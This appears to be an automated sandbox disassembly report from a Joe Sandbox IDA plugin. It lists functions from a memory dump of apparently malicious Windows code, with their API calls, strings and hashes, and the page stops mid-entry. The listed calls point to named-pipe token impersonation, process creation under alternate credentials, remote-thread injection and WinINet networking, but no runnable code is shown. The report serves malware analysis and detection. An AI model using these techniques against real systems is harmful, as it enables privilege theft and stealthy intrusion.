Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Virtual$AllocErrorFreeLast$ResumeThreadVersion_memset
String ID:
API String ID: 3980149099-0
Opcode ID: 04105331977ff0a6ed06664d201a76a02b281d456432adbd0c1cd184f62c5d1c
Instruction ID: ae93bd438986b4b45fbf6514ee4bbfea0996945b3b4926919500826496d48dd6
Opcode Fuzzy Hash: 04105331977ff0a6ed06664d201a76a02b281d456432adbd0c1cd184f62c5d1c
Instruction Fuzzy Hash: 5E31BF72A50319AFFBB09F659C45F5B77E8AB04715F104069FB0EEB280D7B09D049BA1

Uniqueness

Uniqueness Score: -1.00%

Function 06763697 Relevance: 13.6, APIs: 9, Instructions: 58pipethreadfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 067636B4
GetLastError.KERNEL32 ref: 067636C7
ConnectNamedPipe.KERNEL32(00000000), ref: 067636DB
ReadFile.KERNEL32(?,00000001,?,00000000), ref: 067636F5
ImpersonateNamedPipeClient.ADVAPI32 ref: 06763705
GetCurrentThread.KERNEL32 ref: 0676371A
OpenThreadToken.ADVAPI32(00000000), ref: 06763721
DisconnectNamedPipe.KERNEL32(FFFFFFFF), ref: 06763735
CloseHandle.KERNEL32 ref: 06763741

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientCloseConnectCurrentDisconnectErrorFileHandleImpersonateLastOpenReadToken_memset
String ID:
API String ID: 3848656792-0
Opcode ID: 3795367d46fcfd4f6c7f4a850ff42527195c175e71e88c5781eca3a880d80b97
Instruction ID: 0be99263c88ca2f7554dd61816837ee6cae66e83bc27dc716b818f4c830fd2b1
Opcode Fuzzy Hash: 3795367d46fcfd4f6c7f4a850ff42527195c175e71e88c5781eca3a880d80b97
Instruction Fuzzy Hash: 48117C70A94209FFEB519BA5EC88A7A37AEEB00744F64C064FB15D1051EA319D05DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0676411E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130processCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F52
Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F62

_memset.LIBCMT ref: 06764181
GetStartupInfoA.KERNEL32(?), ref: 06764199

Part of subcall function 06762E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,0676406E,00000400,?,06763E93,0676406E,?,00000400), ref: 06762EAF
Part of subcall function 06762E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,0676406E,06763E93,?,06763E93,0676406E,?,00000400,?,?,?,?,0676406E), ref: 06762EC8

GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 067641FE
GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 06764208
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,06762FA0), ref: 06764233
GetLastError.KERNEL32 ref: 06764242

Part of subcall function 067624B5: _vswprintf_s.LIBCMT ref: 067624D1

Strings

%s as %s\%s: %d, xrefs: 06764252

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
String ID: %s as %s\%s: %d
API String ID: 963358868-816037529
Opcode ID: 7e0157e53c70d8732b82421de2189ee141dff1b134763a5358b895dbd8ca5a97
Instruction ID: 854a6f625cf3758c4dbcd33687bdf8d3330c47d19ecd6c6d97f64be3dc67aad6
Opcode Fuzzy Hash: 7e0157e53c70d8732b82421de2189ee141dff1b134763a5358b895dbd8ca5a97
Instruction Fuzzy Hash: 4D414BB1D00208BFDF91AFA6DC49EDFBFB9EF48350F204015FA24A6160D6754A50DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0676B6F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0676B714
_memset.LIBCMT ref: 0676B722
_memset.LIBCMT ref: 0676B730
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,0676B7CF,?,?,?,?,?,0676B7CF,?,?), ref: 0676B74D
LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0676B77C
__snprintf.LIBCMT ref: 0676B79E

Strings

%s\%s, xrefs: 0676B797

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _memset$AccountInformationLookupToken__snprintf
String ID: %s\%s
API String ID: 2009363630-4073750446
Opcode ID: 7eb3f24efdfbf9a8821da8d7375c22c9a25ee4ea1603e76d620acd20a93b44f7
Instruction ID: 21fda933c130cacc1798871b31a845f577933fc6185bafc0308dab3bc42cfd95
Opcode Fuzzy Hash: 7eb3f24efdfbf9a8821da8d7375c22c9a25ee4ea1603e76d620acd20a93b44f7
Instruction Fuzzy Hash: 5021D3B295121CBEDF51DB91DC84EEB777CEF04744F0484BABA25E2100D670AB848B64

Uniqueness

Uniqueness Score: -1.00%

Function 0676B27B Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0676B28C

Part of subcall function 06776F7E: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,0676B291,00000000), ref: 06776F89
Part of subcall function 06776F7E: __aulldiv.LIBCMT ref: 06776FA9

_malloc.LIBCMT ref: 0676B2B5
_strncpy.LIBCMT ref: 0676B2D5
_strtok.LIBCMT ref: 0676B2EC
_strtok.LIBCMT ref: 0676B30B

Part of subcall function 06776EBD: __getptd.LIBCMT ref: 06776EDB

__time64.LIBCMT ref: 0676B31D
__time64.LIBCMT ref: 0676B3AC
__time64.LIBCMT ref: 0676B448

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: __time64$Time_strtok$FileSystem__aulldiv__getptd_malloc_strncpy
String ID:
API String ID: 2319056096-0
Opcode ID: c5c44025edc358ba10cbd29de586391f5a579714d1159053715a2508d75bb739
Instruction ID: f61c16170a71b54ecc1003392ac7da0bb27d19cdad6578922941bb0f7772459e
Opcode Fuzzy Hash: c5c44025edc358ba10cbd29de586391f5a579714d1159053715a2508d75bb739
Instruction Fuzzy Hash: 8B5149B1E02204DFCB91DF6AE9818697BF3F74A710720C12EEA29C7200D7719992DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0636A6B8 Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0636A6C9

Part of subcall function 063763BB: __aulldiv.LIBCMT ref: 063763E6

_malloc.LIBCMT ref: 0636A6F2
_strncpy.LIBCMT ref: 0636A712
_strtok.LIBCMT ref: 0636A729
_strtok.LIBCMT ref: 0636A748

Part of subcall function 063762FA: __getptd.LIBCMT ref: 06376318

__time64.LIBCMT ref: 0636A75A
__time64.LIBCMT ref: 0636A7E9
__time64.LIBCMT ref: 0636A885

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: __time64$_strtok$__aulldiv__getptd_malloc_strncpy
String ID:
API String ID: 3363204686-0
Opcode ID: 14cd0875e9ca5e3a7e750f6e52949a99e3413afe09cbdd003b127a6c368c3a31
Instruction ID: 4da3f0cacf02809a2a8f988928e2dc051475b75824ef5cb21dd2ef29e492429c
Opcode Fuzzy Hash: 14cd0875e9ca5e3a7e750f6e52949a99e3413afe09cbdd003b127a6c368c3a31
Instruction Fuzzy Hash: 8B5146B5C04660DFE7A6DF6ACDC0855BBB5F74A311310C02EE4599B226EB3899C5DF80

Uniqueness

Uniqueness Score: -1.00%

Function 06360FA2 Relevance: 10.9, APIs: 7, Instructions: 422COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0636123A
_memset.LIBCMT ref: 0636127A
_memset.LIBCMT ref: 063612C4
_memset.LIBCMT ref: 0636130E
_memset.LIBCMT ref: 06361358
_memset.LIBCMT ref: 063613A8
_memset.LIBCMT ref: 063613D0

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 913e89af5243476f04ccb29c9e1c7413528508fbc0330dd79404e9a5dc4655e9
Instruction ID: a05634fa62524e748640478add866c31227211171fcd9a14aac39d6ac87d64ce
Opcode Fuzzy Hash: 913e89af5243476f04ccb29c9e1c7413528508fbc0330dd79404e9a5dc4655e9
Instruction Fuzzy Hash: 61D1D5B2A007019FE7A0DFAACCC1A56B7F9FF88204718893DF157D6A50D274F9598B90

Uniqueness

Uniqueness Score: -1.00%

Function 0677696C Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 067769CE
_memcpy_s.LIBCMT ref: 06776A43
__fileno.LIBCMT ref: 06776AA3
__read.LIBCMT ref: 06776AAA
__filbuf.LIBCMT ref: 06776ACE
_memset.LIBCMT ref: 06776B14
_memset.LIBCMT ref: 06776B3F

Part of subcall function 0677747A: __getptd_noexit.LIBCMT ref: 0677747A

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: e447b5ff670cd6589ed4a6518e869322e0d8401e588111de29eaec9ae058076f
Instruction ID: db66c60962d58d4b66b0d4cab03a13a7ab598a6eb9aa8bfc391c591af252f89a
Opcode Fuzzy Hash: e447b5ff670cd6589ed4a6518e869322e0d8401e588111de29eaec9ae058076f
Instruction Fuzzy Hash: E1513931E00A14EFDFA18F69CC485AEBBB5EF51320F24C229F83556198E7309A51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06375DA9 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06375E0B
_memcpy_s.LIBCMT ref: 06375E80
__fileno.LIBCMT ref: 06375EE0
__read.LIBCMT ref: 06375EE7
__filbuf.LIBCMT ref: 06375F0B
_memset.LIBCMT ref: 06375F51
_memset.LIBCMT ref: 06375F7C

Part of subcall function 063768B7: __getptd_noexit.LIBCMT ref: 063768B7

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: 1f39b527286e668607814d7425d22a3f506632a424d9febc42428c9cc82c10c6
Instruction ID: a95dc5f4e990ab3ae209a6482a40a457692fafd4ce5883035e205f2f15e56b20
Opcode Fuzzy Hash: 1f39b527286e668607814d7425d22a3f506632a424d9febc42428c9cc82c10c6
Instruction Fuzzy Hash: 4751D131D00209EFDBB88F698C4899EBBB5EF41330F148629E83592590DB399A55CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 06763D12 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98processCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,06763F37,F3E8296A,83FFFFE3,0676406E,74DEE010), ref: 06763D44
GetLastError.KERNEL32 ref: 06763D56
_memset.LIBCMT ref: 06763D9F

Strings

system32, xrefs: 06763DA4
sysnative, xrefs: 06763D82

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CreateErrorLastLogonProcessWith_memset
String ID: sysnative$system32
API String ID: 2584212486-2461298002
Opcode ID: b6e6afce7ffabb1adf80e6a628828b5f161b8e140dd1a32c6bd5270616f3763d
Instruction ID: afd48ceb8729a1c74a7fff40cafb9fcc3c78fa102c0bf040402d86f80619e823
Opcode Fuzzy Hash: b6e6afce7ffabb1adf80e6a628828b5f161b8e140dd1a32c6bd5270616f3763d
Instruction Fuzzy Hash: B8313676900204AFCF629F61EC09FA33BAAEF49320F288054FE55DB111E771D954C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0676575A Relevance: 10.6, APIs: 7, Instructions: 67threadinjectionlibraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 0676576A
GetProcAddress.KERNEL32(00000000), ref: 06765771
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 0676579F
GetThreadContext.KERNEL32(00000000,?), ref: 067657CE
SetThreadContext.KERNEL32(00000000,00010007), ref: 067657E9

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Thread$Context$AddressCreateHandleModuleProcRemote
String ID:
API String ID: 1591005814-0
Opcode ID: ffc5c426126cc7efbc2a576590bfb70d35b62822a9da5906b657bb673667e039
Instruction ID: 4bcdc46cf6fe9131fa02c842aa8e80028368d284728de6e151cfe50aabce5b79
Opcode Fuzzy Hash: ffc5c426126cc7efbc2a576590bfb70d35b62822a9da5906b657bb673667e039
Instruction Fuzzy Hash: 8C118F31952119EFEB619F26DC48EBF3FADFF05650F648025FA0AD1040D6308950EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 06766074 Relevance: 10.6, APIs: 7, Instructions: 62pipefileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,?,06766156,0676626B,00000000,?,0676626B,?), ref: 06766098
WaitNamedPipeA.KERNEL32(0676626B,00002710), ref: 067660AD
CreateFileA.KERNEL32(0676626B,C0000000,00000000,00000000,00000003,00000000,00000000,?,00000000,00000000,00000000,?,06766156,0676626B,00000000), ref: 067660C5
SetNamedPipeHandleState.KERNEL32(00000000,0676626B,00000000,00000000,?,00000000,00000000,00000000,?,06766156,0676626B,00000000,?,0676626B,?), ref: 067660DB
DisconnectNamedPipe.KERNEL32(00000000,?,00000000,00000000,00000000,?,06766156,0676626B,00000000,?,0676626B,?), ref: 067660E7
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000,?,06766156,0676626B,00000000,?,0676626B,?), ref: 067660EF

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: NamedPipe$Handle$CloseCreateDisconnectErrorFileLastStateWait
String ID:
API String ID: 2500665662-0
Opcode ID: 67bc1384453582968b39984f8f89cd8542bd9e8adbf92573b3372ab23e0b5783
Instruction ID: 7048b8bff3d01832051a81053801a994f374495e424271c642a299514408f70d
Opcode Fuzzy Hash: 67bc1384453582968b39984f8f89cd8542bd9e8adbf92573b3372ab23e0b5783
Instruction Fuzzy Hash: 361161B1960118BFEB455B65DC49F7B3AAEEB05700FA08579FE02D5090EA709D008A62

Uniqueness

Uniqueness Score: -1.00%

Function 067669D9 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 067669E7
ioctlsocket.WS2_32(?,8004667E,?), ref: 06766A0B
GetTickCount.KERNEL32 ref: 06766A42
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 06766A67

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: 54da00a18ea932616aa67b52ad7464d9ca8235c6e6c0bb10b3fbf7f5bad7c6d1
Instruction ID: 3b1d10d3eef0dd491b846fc61b3a05b82163a1dc2aff752efe27e7fd52aede83
Opcode Fuzzy Hash: 54da00a18ea932616aa67b52ad7464d9ca8235c6e6c0bb10b3fbf7f5bad7c6d1
Instruction Fuzzy Hash: FD11707595011CBFEB50CFA2CC49BED7BA9EB00369F90C024FA15E6090D7B8D944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0676BE73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0676BE7A

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

_malloc.LIBCMT ref: 0676BE87
_malloc.LIBCMT ref: 0676BEA2
__snprintf.LIBCMT ref: 0676BEB5
_malloc.LIBCMT ref: 0676BED4

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 0676BEA8

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap__snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3929630252-2739389480
Opcode ID: 6e3bdf64e67a8bcd98fd70b6a21b51b02958c6ef4a1eea4036b64b0123e029e8
Instruction ID: 25f8d8d3eecd1454772539d19d7343881edc964edb3bfa1e9a5c785763adcaf0
Opcode Fuzzy Hash: 6e3bdf64e67a8bcd98fd70b6a21b51b02958c6ef4a1eea4036b64b0123e029e8
Instruction Fuzzy Hash: B90186719113446FDBD0AF79DC48E57BFE8DF55750B00846DF568C7200EA70D5048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 06361B6D Relevance: 9.1, APIs: 6, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 06361B98
_memset.LIBCMT ref: 06361BAD
__snprintf.LIBCMT ref: 06361BEB
__snprintf.LIBCMT ref: 06361C07
__snprintf.LIBCMT ref: 06361C67
__snprintf.LIBCMT ref: 06361C7E

Part of subcall function 06374E63: __output_l.LIBCMT ref: 06374EE5

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset$__output_l
String ID:
API String ID: 1270732810-0
Opcode ID: 2a8897ec43ab90436752b0e96a364baffae3cad7c46d73969b4e107cd58de504
Instruction ID: 151dfee38246400bfef1486d050254d63b4d67294ec64dd46ae720fca047cd4e
Opcode Fuzzy Hash: 2a8897ec43ab90436752b0e96a364baffae3cad7c46d73969b4e107cd58de504
Instruction Fuzzy Hash: 5A41D072C00168AFEB92EFA5CC88EEE7B7DEF09204F0440A5F601B7151D7359A498BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0676250F Relevance: 9.1, APIs: 6, Instructions: 114networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

InternetOpenA.WININET(0676152B,00000003,00000000,00000000,00000000), ref: 06762590
InternetSetOptionA.WININET(00000005,0003A980,00000004), ref: 067625AF
InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 067625BF
InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,06796C58), ref: 067625D7
InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 06762608
InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 06762624

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpen
String ID:
API String ID: 230958251-0
Opcode ID: 07ec2213ba110b4f1c738f1a6094b9729fd35a2f7eb235925764ec225fae1071
Instruction ID: 1db3fad24def23957bbe58d96f56d375dd27412ee8f555b2e0217bec35167d27
Opcode Fuzzy Hash: 07ec2213ba110b4f1c738f1a6094b9729fd35a2f7eb235925764ec225fae1071
Instruction Fuzzy Hash: 0331867564025479EAF16A279C0DF7F3B6DEBC1B51F20C026FF10E90D5EAB84A82D621

Uniqueness

Uniqueness Score: -1.00%

Function 06761A64 Relevance: 9.1, APIs: 6, Instructions: 92memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,0676167C,00000000,00000000,00000080,?,?,0676B61F,00000000,00000001,00000000,00000000,0676167C), ref: 06761ADC
_memset.LIBCMT ref: 06761B02

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: ProtectVirtual_memset
String ID:
API String ID: 3860425497-0
Opcode ID: 3255ba209a6d292a53ffe18f9f219d448e9eae461bd79c333a39ed967fb5c36d
Instruction ID: 4c9e0c4bbfae9894918e71f88e305aeb2cf781f53f4222f58060cb2a854c2063
Opcode Fuzzy Hash: 3255ba209a6d292a53ffe18f9f219d448e9eae461bd79c333a39ed967fb5c36d
Instruction Fuzzy Hash: 7D21E536A01116EEDBA06F2BAD8DFB937AADB00711BA0C026FF15D7140E7744CC6C661

Uniqueness

Uniqueness Score: -1.00%

Function 067635A6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32(00000000), ref: 06763601
htonl.WS2_32(?), ref: 0676360C
_malloc.LIBCMT ref: 06763623

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

_memset.LIBCMT ref: 0676367C

Part of subcall function 0676ABCE: __snprintf.LIBCMT ref: 0676AC0D
Part of subcall function 0676ABCE: __snprintf.LIBCMT ref: 0676AC1F

Strings

zyxwvutsrqponmlk, xrefs: 06763668

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

